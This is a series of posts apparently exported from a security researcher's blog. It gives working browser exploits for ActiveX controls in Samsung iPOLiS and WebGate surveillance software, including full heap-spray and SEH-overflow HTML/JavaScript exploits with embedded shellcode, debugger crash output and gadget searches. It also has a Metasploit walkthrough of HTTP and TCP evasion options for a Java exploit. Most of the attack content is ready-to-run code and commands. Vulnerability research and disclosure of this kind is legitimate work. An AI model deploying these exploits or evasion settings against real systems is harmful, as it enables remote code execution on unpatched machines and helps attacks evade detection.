<a href="https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/">https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/</a>Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-51002031348486342312015-04-17T21:20:00.001+05:302015-04-17T21:26:51.554+05:30Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution (Heap Spray)<br />
Both the commands given below will generate same payload but msfpayload will be discontinued from future metasploit releases.<br />
<span style="color: #cc0000;">root@kali-ucs:~# msfpayload windows/exec cmd=calc J root@kali-ucs:~# msfvenom -p windows/exec cmd=calc -f js_le</span><br />
<i>%ue8fc%u0082<b>%u0000</b>%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285<b>%u0000</b>%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100</i><br />
root@kali-ucs:~#<br />
<br />
Selecting js_be option to <span style="font-family: Courier New, Courier, monospace;">mefvenom </span>will throw "Big endian format selected for a non big endian payload" error.<br />
<br />
Javascript shellcode can have null bytes.<br />
<br />
<script src="https://google-code-prettify.googlecode.com/svn/loader/run_prettify.js"></script>
<pre class="prettyprint">
<html>
<!--
Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution (heap spray)
CVE: 2015-0555
Author: Praveen Darshanam
http://blog.disects.com/2015/02/samsung-ipolis-1122-xnssdkdeviceipinsta.html
http://darshanams.blogspot.com/
Tested on Windows XP SP3 IE6/7
Thanks to Peter Van Eeckhoutte for his wonderfull exploit writing tutorials
--><br />
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
<script>
<br />
var shellcode = unescape('%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100');<br />
var bigblock = unescape('%u9090%u9090');
var headersize = 20;
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
<br />
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
<br />
var memory = new Array();
for (i = 0; i < 500; i++){ memory[i] = block + shellcode }
<br />
// SEH and nSEH will point to 0x06060606
// 0x06060606 will point to (nops+shellcode) chunk
var hbuff = "";
for (i = 0; i <5000; i++)
{
<span class="Apple-tab-span" style="white-space: pre;"> </span>hbuff += "\x06";
}
<br />
// trigget crash
target.ReadConfigValue(hbuff);<br />
</script>
</html>
</pre>Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-59198987510451016302015-04-17T20:47:00.002+05:302015-04-17T20:47:42.953+05:30HTTP Evasions using Metasploit FrameworkHTTP Evasions using metasploit module java_jre17_reflection_types. Below are the details of HTTP exploit which we will be using for our tests.<br />
<span style="color: #cc0000;">msf > info exploit/multi/browser/java_jre17_reflection_types</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Name: Java Applet Reflection Type Confusion Remote Code Execution</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Module: exploit/multi/browser/java_jre17_reflection_types</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Platform: Java, Linux, OSX, Windows</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>CVE: 2013-2423 (http://cvedetails.com/cve/2013-2423/)</span><br />
<br />
Execute below commands to start using the exploit for launching attacks<br />
<span style="color: #cc0000;">msf > use exploit/multi/browser/java_jre17_reflection_types </span><br />
<span style="color: #cc0000;">msf exploit(java_jre17_reflection_types) ></span><br />
<br />
Execute <span style="font-family: Courier New, Courier, monospace;">show options</span> command to know what parameters need to be set before launching attack.<br />
We need to set different options like destination IP/port, local IP/port and payload.<br />
<br />
Following are different evasions which are supported by Metasploit.<br />
<span style="color: #cc0000;">msf exploit(java_jre17_reflection_types) > show evasion </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module evasion options:</span><br />
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTML::base64</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: none</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Enable HTML obfuscation via an embeded base64 html object (IE </span><br />
<span style="font-family: Courier New, Courier, monospace;"> not supported) (accepted: none, plain, single_pad, double_pad, </span><br />
<span style="font-family: Courier New, Courier, monospace;"> random_space_injection)</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTML::javascript::escape</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: 0</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Enable HTML obfuscation via HTML escaping (number of iterations)</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTML::unicode</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: none</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Enable HTTP obfuscation via unicode (accepted: none, utf-16le, </span><br />
<span style="font-family: Courier New, Courier, monospace;"> utf-16be, utf-16be-marker, utf-32le, utf-32be)</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTTP::chunked</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: false</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Enable chunking of HTTP responses via "Transfer-Encoding: </span><br />
<span style="font-family: Courier New, Courier, monospace;"> chunked"</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTTP::compression</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: none</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Enable compression of HTTP responses via content encoding </span><br />
<span style="font-family: Courier New, Courier, monospace;"> (accepted: none, gzip, deflate)</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTTP::header_folding</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: false</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Enable folding of HTTP headers</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTTP::junk_headers</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: false</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Enable insertion of random junk HTTP headers</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTTP::server_name</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: Apache</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Configures the Server header of all outgoing replies</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : TCP::max_send_size</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: 0</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Maximum tcp segment size. (0 = disable)</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : TCP::send_delay</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: 0</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Delays inserted before every send. (0 = disable)</span><br />
msf exploit(java_jre17_reflection_types) ><br />
<br />
To select any evasion execute command similar to<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">msf exploit(java_jre17_reflection_types) > set evasion_name parameter</span><br />
e.g.<br />
<span style="color: #cc0000;">msf exploit(java_jre17_reflection_types) > set HTTP::compression gzip</span><br />
<span style="color: #cc0000;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhno_yikEswJayMl4q3tIQAm9oNHaMG7vDREGO9LDZFXl19YN-UYe3MI0A3JLqrWcj9hzxUgooCoJbLpkvqi2YsSsa89gW5vgMB34Gm1GHBlTQ0RnOFvbvV5kQJO-AGy3BrPBcQuy-1vVU4/s1600/reflection_set_evasion.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhno_yikEswJayMl4q3tIQAm9oNHaMG7vDREGO9LDZFXl19YN-UYe3MI0A3JLqrWcj9hzxUgooCoJbLpkvqi2YsSsa89gW5vgMB34Gm1GHBlTQ0RnOFvbvV5kQJO-AGy3BrPBcQuy-1vVU4/s1600/reflection_set_evasion.png" height="176" width="400" /></a></div>
<br />
<b>base64</b><br />
Encode HTML page with base64, payload is not delivered in this case.<br />
Base64 is binary-to-text encoding scheme that represent binary data in an ASCII string format by translating it into a radix-64 representation.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirAxpryHVc3_rFpN7TkRs4nrW20piPO0nnXh504rx3sygMe2PIfq9KxDDowZ4xHcAv8EJ3TnX5mkztyYChKbP-x4sAI7-BfFBYmbvizsoDTpZW0Qsq2Sl9-YkK-7uhgFAl8UdDVPDmM77Z/s1600/reflection_base64.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirAxpryHVc3_rFpN7TkRs4nrW20piPO0nnXh504rx3sygMe2PIfq9KxDDowZ4xHcAv8EJ3TnX5mkztyYChKbP-x4sAI7-BfFBYmbvizsoDTpZW0Qsq2Sl9-YkK-7uhgFAl8UdDVPDmM77Z/s1600/reflection_base64.png" height="400" width="353" /></a></div>
<br />
<a href="http://www.hcidata.info/base64.htm">http://www.hcidata.info/base64.htm</a><br />
<br />
<b>javascript escape (iteration 1)</b><br />
Insert unescape function into HTML page.<br />
escape() function is used to encode string for portability reasons so it can be transmitted across networks and computers. unescape() function decodes an encoded string.<br />
<br />
String Encoding: <span style="font-family: Courier New, Courier, monospace;">document.write(escape("Escape Function!"));</span><br />
Output of Above Code: Escape%20Function%21<br />
<br />
String Encoding: <span style="font-family: Courier New, Courier, monospace;">document.write(unescape("Escape%u20Function%u21"));</span><br />
Output of Above Code: Escape Function!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqNfzWH0p0SLQZH1nB-WqmicLWUpdo6gKZc7jVLt88_aGJGU2tI19bgfKtmhO6icSir4gB2cyBIxVSKGq2OLFn4fElSz8j2jMs1w5VGiAtv8rJUazQdI-Otk4YjqWVzmXut13qcA5mEEM_/s1600/reflection_javascript_unescape.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqNfzWH0p0SLQZH1nB-WqmicLWUpdo6gKZc7jVLt88_aGJGU2tI19bgfKtmhO6icSir4gB2cyBIxVSKGq2OLFn4fElSz8j2jMs1w5VGiAtv8rJUazQdI-Otk4YjqWVzmXut13qcA5mEEM_/s1600/reflection_javascript_unescape.png" height="253" width="400" /></a></div>
<br />
<br />
<b>unicode (utf16-be)</b><br />
Unicode provides a unique number for every character, no matter what the platform, no matter what the program, no matter what the language.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSrn8F6xnD9OzCoZrNHAnE1YSlGS_RujxpeQFr0i3LKFEXkaLS4fCV2eYSkPJI5o0blSyYm7kq7q_j4pI5vnY0CsZwxgxNxoibVzxL0GP7YYUukBKrJXv4l1z3RE4oMEvnnQHKWRUUOxyt/s1600/reflection_unicode_utf16be.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSrn8F6xnD9OzCoZrNHAnE1YSlGS_RujxpeQFr0i3LKFEXkaLS4fCV2eYSkPJI5o0blSyYm7kq7q_j4pI5vnY0CsZwxgxNxoibVzxL0GP7YYUukBKrJXv4l1z3RE4oMEvnnQHKWRUUOxyt/s1600/reflection_unicode_utf16be.png" height="400" width="356" /></a></div>
For more info on Unicode<br />
<a href="http://unicode.org/standard/WhatIsUnicode.html">http://unicode.org/standard/WhatIsUnicode.html</a><br />
<br />
<b>chunked</b><br />
Instead of "Content-Length" header, HTTP response will have "Transfer-Encoding" and data is sent in chunks whose size is mentioned at the start of the HTTP response data.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyvAConj207YTXl20EhkopsMTXfdXxrIkjvKLvZqGgXvNirNMb2Eh89YvaEGufEzIxBY9RQ9WEHYgmefPGQppo2fkTzLWepcCvFsjnkg6is0YhxlsoP9G6M-U0gxesenybwdxvbvcIkXkQ/s1600/reflection_chunked_encoding.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyvAConj207YTXl20EhkopsMTXfdXxrIkjvKLvZqGgXvNirNMb2Eh89YvaEGufEzIxBY9RQ9WEHYgmefPGQppo2fkTzLWepcCvFsjnkg6is0YhxlsoP9G6M-U0gxesenybwdxvbvcIkXkQ/s1600/reflection_chunked_encoding.png" height="258" width="400" /></a></div>
<br />
<br />
<b>compression (gzip)</b><br />
The process of reducing data size is known as “data compression”. GZIP performs best on text-based data say, CSS, JavaScript, HTML, most of the browsers support GZIP compression. For GZIP compression intricacies, refer this <a href="https://www.youtube.com/watch?v=whGwm0Lky2s&feature=youtu.be&t=14m11s">Youtube link</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhydCxnAuLm5PO1zo2ggUp7qetYt6Y3ynJOZFVLRJcihyphenhyphen-5hu5oWXqGHaab4CAVJjI6lSbTjJfTX8EO6wG7m4YEisxtEZhXBQI3_PpSzeZjOW13qtetdJwwJ5V6Lj5GUQzTn_mAmAreNTXz/s1600/reflection_compression_gzip.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhydCxnAuLm5PO1zo2ggUp7qetYt6Y3ynJOZFVLRJcihyphenhyphen-5hu5oWXqGHaab4CAVJjI6lSbTjJfTX8EO6wG7m4YEisxtEZhXBQI3_PpSzeZjOW13qtetdJwwJ5V6Lj5GUQzTn_mAmAreNTXz/s1600/reflection_compression_gzip.png" height="357" width="400" /></a></div>
<br />
<br />
<b>Header Folding</b><br />
Insert characters like space(\x20), horizontal tab(\x09) etc. between headers.<br />
From RFC 2616, <br />
HTTP/1.1 header field values can be folded onto multiple lines if the continuation<br />
line begins with a space or horizontal tab. All linear white space, including folding,<br />
has the same semantics as SP. A recipient MAY replace any linear white space<br />
with a single SP before interpreting the field value or forwarding the message<br />
downstream.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTQABHfKNmh_YZezu5ZyxQ2yjoK6exFCbZk-aZoIJearfDrmhxAxNXuo1XFOiC4R11dzbOO5WH5KzTgSMknaTpnY9pu5Epu3p-BpGVKvufjnodIB3B1IYxWylUinxFB1F2ompVE2G7oyUc/s1600/reflection_header_folding.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTQABHfKNmh_YZezu5ZyxQ2yjoK6exFCbZk-aZoIJearfDrmhxAxNXuo1XFOiC4R11dzbOO5WH5KzTgSMknaTpnY9pu5Epu3p-BpGVKvufjnodIB3B1IYxWylUinxFB1F2ompVE2G7oyUc/s1600/reflection_header_folding.png" height="400" width="386" /></a></div>
<br />
<br />
<b>Junk Headers</b><br />
Insert invalid headers into the HTTP response.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs-orORfSRAOVrKB9StOhJbWaNUMqRLBW_MdKJajyujOaPkhvtTN9WHVo1aQLsJEq0uY07J8c8UKMXS3NJ7wYMWV0rJQaeSTqeqko7JHoUPjkzyiWTCqitfpoy_oCE9d99CgLYsuPJu4wh/s1600/reflection_junk_headers.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs-orORfSRAOVrKB9StOhJbWaNUMqRLBW_MdKJajyujOaPkhvtTN9WHVo1aQLsJEq0uY07J8c8UKMXS3NJ7wYMWV0rJQaeSTqeqko7JHoUPjkzyiWTCqitfpoy_oCE9d99CgLYsuPJu4wh/s1600/reflection_junk_headers.png" height="400" width="375" /></a></div>
<br />
<br />
<b>TCP max_send_size</b><br />
Metasploit doesn't send packets with segment size of 8 bytes when max_send_size is set to 8. In the normal attack scenario we were sending 30 to 40 packets but in this evasion type we send 80 packets.<br />
<br />
<b>TCP send_delay</b><br />
<div>
TCP Delay, not sure the value passed is micro seconds or seconds, we doesn't see any delay between packets.<br />
<br /></div>
Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-9393313130407243282015-03-28T00:06:00.001+05:302015-03-28T00:20:03.903+05:30CVE-2015-2094: WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Remote Code Execution Vulnerability (0Day)During PoC testing, to check stack alignment with below assignment<br />
nseh = "DDDD";<br />
var seh = "EEEE";<br />
<br />
Process attachProcess attachProcess attach end(3eb4.39f8): Access violation - code c0000005 (first chance)<br />
First chance exceptions are reported before any exception handling.<br />
This exception may be expected and handled.<br />
eax=00000e20 ebx=00000041 ecx=0329fc34 edx=00002711 esi=77c50041 edi=020bf1e0<br />
eip=77c1dcbf esp=020bf178 ebp=020bf1a0 iopl=0 nv up ei ng nz ac pe cy<br />
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210297<br />
msvcrt!__wcstombs_mt+0x56:<br />
77c1dcbf 881c07 mov byte ptr [edi+eax],bl ds:0023:020c0000=4d<br />
0:008> !exchain<br />
<b>020bf260</b>: <b><span style="color: #38761d;">45454545</span></b><br />
Invalid exception stack at <span style="color: #cc0000;"><b>44444444</b></span><br />
0:008> d 020bf260<br />
<b>020bf260 <span style="color: #cc0000;">44 44 44 44</span></b> <b><span style="color: #38761d;">45 45 45 45</span></b>-90 90 90 90 90 90 90 90 DDDDEEEE........<br />
020bf270 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020bf280 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020bf290 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020bf2a0 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020bf2b0 90 90 90 90 90 90 90 90-41 41 41 41 41 41 41 41 ........AAAAAAAA<br />
020bf2c0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />
020bf2d0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />
0:008> d fs:[0]<br />
003b:00000000 <b>60 f2 0b 02</b> 00 00 0c 02-00 00 0b 02 00 00 00 00 `...............<br />
003b:00000010 00 1e 00 00 00 00 00 00-00 60 fd 7f 00 00 00 00 .........`......<br />
003b:00000020 b4 3e 00 00 f8 39 00 00-00 00 00 00 00 00 00 00 .>...9..........<br />
003b:00000030 00 80 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
003b:00000040 f0 3c 24 e1 00 00 00 00-00 00 00 00 00 00 00 00 .<$.............<br />
003b:00000050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
003b:00000060 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
003b:00000070 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Module info :</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0x00870000 | 0x00ffa000 | 0x0078a000 | True | True | False | False | True | 6.0.1 [IPPDecoder.dll] (C:\WINDOWS\system32\WESPSDK\IPPDecoder.dll)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0x10000000 | 0x100e0000 | 0x000e0000 | False | False | False | False | True | 1.6.42.0 [WESPPlayback.dll]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0x1007f29e : pop ebx # retn # pop esi # xor al,al # pop ebx # retn | {PAGE_EXECUTE_READ} [WESPPlayback.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll)</span><br />
<br />
Final Exploit<br />
<script src="https://google-code-prettify.googlecode.com/svn/loader/run_prettify.js"></script>
<br />
<pre class="prettyprint"><html>
<title>WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Vulnerability (0Day)</title>
<!--
targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype = "Sub StopSiteAllChannel ( ByVal SiteSerialNumber As String )"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
Vulnerable Product = WinRDS 2.0.8
Software = http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36
-->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='ssac'>
</object>
<script>
var buff1 = "";
var nops = "";
var buff2 = "";
for (i=0;i<128; i++)
{
buff1 += "B";
}
nseh = "\xeb\x08PD";
var seh = "\xa0\xf2\x07\x10";
for (i=0;i<80; i++)
{
nops += "\x90";
}
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(5000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
buff2 += "A";
}
fbuff = buff1 + nseh + seh + nops + sc + buff2;
ssac.StopSiteAllChannel(fbuff);
</script>
</html>
</pre>
<br />
Refer below link for other WebGate exploit<br />
<a href="http://blog.disects.com/2015/03/webgate-edvr-manager.html">http://blog.disects.com/2015/03/webgate-edvr-manager.html</a>Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-35190201335139174892015-03-25T23:51:00.000+05:302015-04-07T23:44:00.713+05:30WebGate eDVR Manager WESPMonitor.WESPMonitorCtrl LoadImage Stack Buffer Overflow Remote Code Execution (CVE-2015-2097)<br />
WEBGATE Embedded Standard Protocol (WESP) SDK has multiple Remote Code Execution Vulnerabilities in different ActiveX controls.<br />
<br />
Use below mona command to find pop pop ret address which creates findwild.txt at C:\Program Files\Immunity Inc\Immunity Debugger<br />
<span style="color: #cc0000;">!mona findwild -s "pop r32#*#pop r32#*#ret"</span><br />
<br />
Snip of findwild.txt (addresses which I tried to use)<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x10079740 </b>: pop esi # xor al,al # pop ebx # retn | {PAGE_EXECUTE_READ} [WESPMonitor.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\<b>WESPMonitor.dll</b>)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x100580bd </b>: pop ebp # pop ebx # mov dword ptr fs:[0],ecx # add esp,34 # retn | {PAGE_EXECUTE_READ} [WESPMonitor.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\<b>WESPMonitor.dll</b>)</span><br />
